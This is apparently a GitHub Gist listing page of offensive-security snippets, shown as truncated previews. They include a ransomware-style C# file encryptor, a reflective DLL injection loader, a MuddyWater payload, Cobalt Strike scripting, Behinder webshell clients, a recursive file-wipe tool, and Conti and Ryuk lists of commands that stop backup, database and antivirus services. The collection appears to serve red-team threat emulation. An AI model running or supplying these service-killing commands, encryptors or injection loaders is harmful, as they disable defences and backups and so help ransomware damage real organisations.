.\wipe <directory>
will rewrite all files in a directory recursively
2XXE (SRA) 2XXE-SRA
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # adapted from https://stackoverflow.com/a/6291111 | |
| # | |
| # TargetObject = account with SPN | |
| # $TargeObject = "LDAP://CN=foo,CN=Users,DC=contoso,DC=local" | |
| # Identity = identity to be put in ACE | |
| # $Identity = [security.principal.ntaccount]"contoso\user" | |
| # $Identity = [security.principal.securityidentified]"S-1-1-0" | |
| # Deny = deny or allow access | |
| Function Set-SpnPermission { | |
| param( |
2XXE-SRA
/ coldencryptor.cs
Last active
December 27, 2023 15:30
poc ransomware like script. generates then encrypts files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Security.Cryptography; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Threading.Tasks; | |
| using Microsoft.Win32; | |
| public class Crypto |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //modified from: https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection | |
| #include <iostream> | |
| #include <windows.h> | |
| #include "resource.h" | |
| typedef struct BASE_RELOCATION_BLOCK { | |
| DWORD PageAddress; | |
| DWORD BlockSize; | |
| } BASE_RELOCATION_BLOCK, * PBASE_RELOCATION_BLOCK; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Payload used by MuddyWater as detailed here: https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html | |
| Replace "http://127.0.0.1:8000/cmd" with link to page containing command | |
| Command page should be something like: "c:\windows\system32\cmd.exe /c calc.exe" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # pip install JPype1 | |
| import jpype | |
| import jpype.imports | |
| from jpype.types import * | |
| import os | |
| os.chdir("<cobaltstrike directory>") # required for auth file lookup | |
| jpype.startJVM() | |
| jpype.addClassPath("<cobaltstrike directory>/cobaltstrike.jar") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| setlocal enabledelayedexpansion | |
| set "true=1" | |
| :loop | |
| if defined true ( | |
| set /p c="%cd%> " | |
| start !c! | |
| set c= |
2XXE-SRA
/ netstop.bat
Last active
January 11, 2022 15:41
Conti net stop commands from: https://blogs.vmware.com/security/2020/07/tau-threat-discovery-conti-ransomware.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| net stop "Acronis VSS Provider" /y | |
| net stop "Enterprise Client Service" /y | |
| net stop "SQLsafe Backup Service" /y | |
| net stop "SQLsafe Filter Service" /y | |
| net stop "Veeam Backup Catalog Data Service" /y | |
| net stop AcronisAgent /y | |
| net stop AcrSch2Svc /y | |
| net stop Antivirus /y | |
| net stop ARSM /y | |
| net stop BackupExecAgentAccelerator /y |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Behinder Webshell Clients | |
| ## php_cmd.py | |
| Minimal client for Behinder PHP webshell (shell.php). Requires Cmd.php from the official client jar. |
2XXE-SRA
/ kill.bat
Created
April 15, 2022 19:26
ryuk kill.bat from https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| net1 stop samss /y | |
| net1 stop veeamcatalogsvc /y | |
| net1 stop veeamcloudsvc /y | |
| net1 stop veeamdeploysvc /y | |
| net.exe stop samss /y | |
| net.exe stop veeamcatalogsvc /y | |
| net.exe stop veeamcloudsvc /y | |
| net.exe stop veeamdeploysvc /y | |
| taskkill.exe /IM sqlbrowser.exe /F | |
| taskkill.exe /IM sqlceip.exe /F |